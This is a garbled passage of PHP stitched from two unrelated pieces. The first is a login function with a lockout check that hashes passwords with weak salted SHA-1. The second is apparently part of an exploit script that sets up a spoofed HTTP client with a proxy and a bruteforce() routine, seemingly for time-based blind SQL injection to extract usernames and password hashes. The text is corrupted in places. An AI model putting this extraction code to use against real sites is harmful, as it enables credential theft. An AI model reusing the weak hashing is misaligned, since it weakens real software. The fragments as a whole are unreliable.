function login_pro($email, $password, $db) { if ($query = $db->prepare("Select id,usename,password,salt from login where email=?")) { $query->bind_param('s', $email); $query->execute(); $query->store_result(); $query->bind_result($user_id, $username, $p_word, $salt); $query->fetch(); $password = hash('sha1', $password . $salt); if ($query->num_rows == 1) { if (bruteforce($user_id, $db) == true) { // Account is locked header('Location: acclocked.php'); } else { // Check if the password in the database matches // the password the user submitted. if ($p_word == $password) { ins_token($db, $email); return true; } else { // Password is not correct // We record this attempt in the database $now = time(); $db->query("INSERT INTO attempts(user_id, time)\n VALUES ('{$user_id}', '{$now}')"); return false; } } } else { // No user exists. return false; } } }
$xpl->agent('Mozilla Firefox'); $xpl->allowredirection(0); $xpl->cookiejar(0); if ($proxy) { $xpl->proxy($proxy); } if ($proxyauth) { $xpl->proxyauth($proxyauth); } if ($debug) { debug(1); } print "\nUsername: "******"\nPassword: "; bruteforce('pwd'); exit(0); function bruteforce($field) { global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result; $a = 0; $v = ''; $dfield = $field; if (eregi('a', $field)) { $b = '-1'; $c = '127'; } else { $b = '46'; $c = '70'; } # pwd charset